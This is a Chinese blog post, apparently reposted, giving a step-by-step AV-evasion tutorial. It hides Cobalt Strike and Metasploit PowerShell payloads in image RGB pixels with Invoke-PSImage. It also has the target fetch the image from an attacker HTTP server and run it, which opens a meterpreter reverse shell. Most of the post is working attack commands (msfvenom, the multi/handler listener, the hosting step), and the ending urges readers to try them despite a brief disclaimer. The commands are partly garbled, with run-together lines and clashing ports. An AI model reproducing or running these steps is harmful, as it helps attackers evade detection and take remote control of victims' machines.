博客
关于我
shellcode隐写到像素RGB免杀上线到CS
阅读量:443 次
发布时间:2019-03-06

本文共 1601 字,大约阅读时间需要 5 分钟。

利用图片像素RGB隐藏Shellcode实现免杀免杀上线(CS与MSF双平台)


前言

最近跟一个朋友一起开发一个站点时,发现站点开了很多杀软,包括各种CSPowershell马和反调试工具,使用传统的CS反调试方法无法成功上线。后来在GitHub上找到了一种将Shellcode隐藏到图片RGB像素的方法,并成功将其上线到CS平台。这个免杀方法效果非常好,且实现相对简单。今天将详细记录这个免杀过程。


本地环境

靶机:Win7

IP:192.168.82.136
攻击机:FSEC
IP:192.168.82.134


步骤

CS平台使用步骤

  • 生成PowerShell脚本

    首先,在CS上生成一个PowerShell脚本文件。可以使用以下命令:

    Set-ExecutionPolicy Unrestricted -Scope CurrentUserImport-Module .\Invoke-PSImage.ps1Invoke-PSImage -Script .\payload.ps1 -Image .\shell.jpg -Out .\shell.png -Web
  • 生成带有Shellcode的图片

    执行上述命令后,会生成一张名为shell.png的图片文件。这个图片文件的每个像素都被修改为特定的RGB值,隐藏了Shellcode。

  • 架设HTTP服务器

    使用Python架设一个简单的HTTP服务器,用于提供隐藏Shellcode的图片。命令如下:

    python3 -m http.server 80
  • 在靶机上运行PowerShell

    将生成的shell.png文件中的URL替换为攻击机的HTTP地址(如http://192.168.82.134/shell.png),然后在靶机上运行PowerShell脚本。Shellcode会通过图片被传递到靶机,并执行相应的攻击代码。


  • MSF平台使用步骤

  • 生成PowerShell反向HTTP支付拉伸(RAT)

    使用Metasploit Framework(MSF)生成一个RATPayload:

    msfvenom -p windows/x64/meterpreter/reverse_http LHOST=192.168.82.134 LPORT=7788 -f psh-reflection > msf.ps1
  • 将Shellcode隐藏到图片中

    将生成的msf.ps1文件与Invoke-PSImage.ps1文件放在同一目录,按照CS平台步骤生成一个带有Shellcode的图片(如msf.png)。

  • 在MSF中设置反向监听

    在攻击机上使用MSF设置一个反向HTTP监听:

    msf6 > use exploit/multi/handlermsf6 > set payload windows/x64/meterpreter/reverse_httpmsf6 > set lhost 192.168.82.134msf6 > set lport 7799msf6 > exploit
  • 在靶机上运行PowerShell

    将生成的msf.png文件中的URL替换为攻击机的HTTP地址(如http://192.168.82.134:7799/msf.png),然后在靶机上运行PowerShell脚本。Shellcode会通过图片被传递到靶机,并执行远程攻击。


  • 结尾

    这种将Shellcode隐藏到图片RGB像素的免杀方法非常实用,既能绕过杀软检测,又能轻松实现远程控制。无论是CS平台还是Metasploit平台,都可以通过简单的命令完成整个流程。对于对技术感兴趣的朋友来说,这是一个非常值得尝试的方法。


    免责声明

    本文仅用于技术交流和学习,严禁将介绍的方法用于非法操作。如果您对他人造成损失,请自行承担后果。如果您无法接受上述约定,请不要阅读本文。

    转载地址:http://reakz.baihongyu.com/

    你可能感兴趣的文章
    php页面静态化技术;学习笔记
    查看>>
    php项目心得以及总结
    查看>>
    PHP项目集成支付宝PC端扫码支付API(国内支付)
    查看>>
    php预定义常量&变量
    查看>>
    R 集成算法③ 随机森林
    查看>>
    php验证码背景色设置无效
    查看>>
    php验证邮箱是否有效
    查看>>
    PHP高性能分布式应用服务器框架-SwooleDistributed
    查看>>
    PHP高效、轻量级表格数据处理库 OpenSpout
    查看>>
    R 数据缺失的处理
    查看>>
    php:$_ENV 和 getenv区别
    查看>>
    PHP:PDOStatement::bindValue参数类型php5和php7问题
    查看>>
    pickle模块
    查看>>
    pid控制
    查看>>
    PID控制介绍-ChatGPT4o作答
    查看>>
    PID控制器数字化
    查看>>
    PIESDKDoNet二次开发配置注意事项
    查看>>
    PIGS POJ 1149 网络流
    查看>>
    PIL Image对图像进行点乘,加上常数(等像素操作)
    查看>>
    PIL.Image、cv2的img、bytes相互转换
    查看>>